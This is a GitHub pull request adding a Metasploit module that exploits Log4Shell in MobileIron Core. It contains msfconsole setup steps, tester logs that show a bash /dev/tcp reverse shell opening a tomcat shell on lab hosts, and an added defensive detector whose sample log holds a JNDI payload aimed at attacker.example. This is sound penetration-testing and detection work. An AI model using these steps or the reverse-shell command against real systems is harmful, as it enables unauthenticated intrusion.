
MobileIron Core Log4Shell RCE Module (CVE-2021-44228) #16837

Merged
merged 2 commits into from
Aug 2, 2022

Conversation

jbaines-r7
Contributor

@jbaines-r7 jbaines-r7 commented Jul 29, 2022

This module exploits MobileIron Core using Log4Shell. The JNDI string is stored in the j_username parameter during a login attempt. Exploitation results in access as the tomcat user. Mandiant noted MobileIron Core has been exploited in the wild.

There is nothing too crazy about this module's implementation. I largely stole from @smcintyre-r7's Ubiquiti Controller and VMware Log4Shell modules. Technically speaking, we could add a bit of a version check in check because you can extract the major.minor version of the target from the login page (/mifs/user/login.jsp). But I opted not to because it seemed like unnecessary work. But, I figured I'd be honest about that detail.

[screenshot: mobileiron_version_login.jsp]

Ivanti states that MobileIron Core before 11.5 is affected. But we only have access to 11.2 and 10.6, so that's what was tested 🤷

Verification

Follow installation steps listed in the module's documentation.

  • Start msfconsole
  • use exploit/linux/http/mobileiron_core_log4shell
  • set LHOST
  • set RHOSTS
  • set SRVHOST
  • set SRVPORT (optional, but I set it to 1389 so msfconsole doesn't have root privs)
  • run
  • A wild reverse shell appears

PoC Video || GTFO

https://www.youtube.com/watch?v=H9tUXMmvZ34

PCAP || GTFO

mobileiron_core_log4shell.zip
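As a defender's companion to the behaviour described in this PR (added here; not code from the module or from Rapid7), the following scans login requests for a Log4j JNDI lookup in the j_username parameter, resolving the common nested-lookup obfuscations first, and screens a major.minor version string against the "before 11.5" statement quoted above. The log line format and the login POST path are constructed assumptions for this example.

```python
import re
from urllib.parse import parse_qs

# Log4j lookups can be nested to hide the literal "jndi" token, e.g. ${${lower:j}ndi:...}.
# Resolve the common ${lower:x} / ${upper:x} / ${...:-x} forms until nothing changes.
NESTED_LOOKUP = re.compile(r'\$\{(?:lower|upper):([^}]*)\}|\$\{[^{}]*:-([^}]*)\}', re.I)
JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:', re.I)


def normalize_lookups(value: str) -> str:
    previous = None
    while previous != value:
        previous = value
        value = NESTED_LOOKUP.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), value)
    return value


def jndi_params(body: str) -> list:
    """Names of form parameters whose URL-decoded value carries a JNDI lookup."""
    params = parse_qs(body, keep_blank_values=True)
    return [name for name, values in params.items()
            if any(JNDI_LOOKUP.search(normalize_lookups(v)) for v in values)]


def scan_login_log(lines: list) -> list:
    """Return (line_index, parameter_names) for every POST carrying a JNDI lookup.
    Assumed (constructed) log line format: 'METHOD PATH BODY'."""
    hits = []
    for idx, line in enumerate(lines):
        parts = line.split(' ', 2)
        if len(parts) < 3 or parts[0] != 'POST':
            continue
        names = jndi_params(parts[2])
        if names:
            hits.append((idx, names))
    return hits


def version_is_affected(version: str) -> bool:
    """Screening check on the major.minor string the login page exposes; the PR cites
    Ivanti's statement that Core before 11.5 is affected. Compared as integers so
    '11.10' does not sort below '11.5'. It cannot see fixes backported within a branch."""
    major, minor = (int(part) for part in version.split('.')[:2])
    return (major, minor) < (11, 5)


# Constructed sample log (not captured from the PR); the POST path is an assumption.
SAMPLE_LOG = [
    'POST /mifs/user/login.jsp j_username=alice&j_password=hunter2',
    'POST /mifs/user/login.jsp j_username=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D&j_password=x',
    'GET /mifs/user/login.jsp -',
]

if __name__ == '__main__':
    for idx, names in scan_login_log(SAMPLE_LOG):
        print(f'line {idx}: JNDI lookup in {names}')
```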

@bwatters-r7
Contributor

msf6 exploit(linux/http/mobileiron_core_log4shell) > show options

Module options (exploit/linux/http/mobileiron_core_log4shell):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LDIF_FILE                   no        Directory LDIF file path
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.132.159     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasplo
                                         it
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local mac
                                         hine or 0.0.0.0 to listen on all addresses.
   SRVPORT    389              yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(linux/http/mobileiron_core_log4shell) > set verbose true
verbose => true
msf6 exploit(linux/http/mobileiron_core_log4shell) > set srvhost 10.5.135.101
srvhost => 10.5.135.101
msf6 exploit(linux/http/mobileiron_core_log4shell) > set srvport 3389
srvport => 3389
msf6 exploit(linux/http/mobileiron_core_log4shell) > check

[*] Attempting to trigger the jndi callback...
[+] 10.5.132.159:443 - The target is vulnerable.
msf6 exploit(linux/http/mobileiron_core_log4shell) > run

[+] bash -c '0<&202-;exec 202<>/dev/tcp/10.5.135.101/4444;sh <&202 >&202 2>&202'
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to trigger the jndi callback...
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Client sent unexpected request 2
[*] Command shell session 1 opened (10.5.135.101:4444 -> 10.5.132.159:48700) at 2022-08-01 16:52:55 -0500
[*] Server stopped.

pwd
/
ls
bin
boot
dev
etc
home
lib
lib64
lost+found
media
mi
mnt
mobileiron.com
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
whoami
tomcat

@bwatters-r7
Contributor

Retest with changes

[ruby-3.0.2@metasploit-framework](land-16837) tmoose@ubuntu:~/rapid7/metasploit-framework$ git log | head -n 5
commit d71350dfe6b6849d06f4a4e4e4948d5fcdb40717
Author: bwatters-r7 <bwatters-r7@github>
Date:   Tue Aug 2 11:04:13 2022 -0500

    Remove superfluous code and add extra check
[ruby-3.0.2@metasploit-framework](land-16837) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfconsole -q
[-] No local database connected, meaning some Metasploit features will not be available. A full list of the affected features & database setup instructions can be found here: https://github.com/rapid7/metasploit-framework/wiki/msfdb:-Database-Features-&-How-to-Set-up-a-Database-for-Metasploit
[-] No results from search
msf6 > use exploit/linux/http/mobileiron_core_log4shell 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/mobileiron_core_log4shell) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 exploit(linux/http/mobileiron_core_log4shell) > set rhosts 10.5.132.159
rhosts => 10.5.132.159
msf6 exploit(linux/http/mobileiron_core_log4shell) > set verbose true
verbose => true
msf6 exploit(linux/http/mobileiron_core_log4shell) > set srvhost 10.5.135.101
srvhost => 10.5.135.101
msf6 exploit(linux/http/mobileiron_core_log4shell) > set srvport 3890
srvport => 3890
msf6 exploit(linux/http/mobileiron_core_log4shell) > check

[*] Attempting to trigger the jndi callback...
[+] 10.5.132.159:443 - The target is vulnerable.
msf6 exploit(linux/http/mobileiron_core_log4shell) > run

[+] bash -c '0<&109-;exec 109<>/dev/tcp/10.5.135.101/4444;sh <&109 >&109 2>&109'
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to trigger the jndi callback...
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Client sent unexpected request 2
[*] Command shell session 1 opened (10.5.135.101:4444 -> 10.5.132.159:33964) at 2022-08-02 11:11:10 -0500
[*] Server stopped.

uname -a
Linux monileiron.example.moose 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
whoami
tomcat

@smcintyre-r7 smcintyre-r7 merged commit a0058c0 into rapid7:master Aug 2, 2022
@smcintyre-r7
Contributor

Merged! Thanks a lot @bwatters-r7 and @jbaines-r7!

@smcintyre-r7
Contributor

Release Notes

This adds an exploit for MobileIron which is affected by the Log4Shell vulnerability. The result is unauthenticated remote code execution in the context of the web application user.

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 2, 2022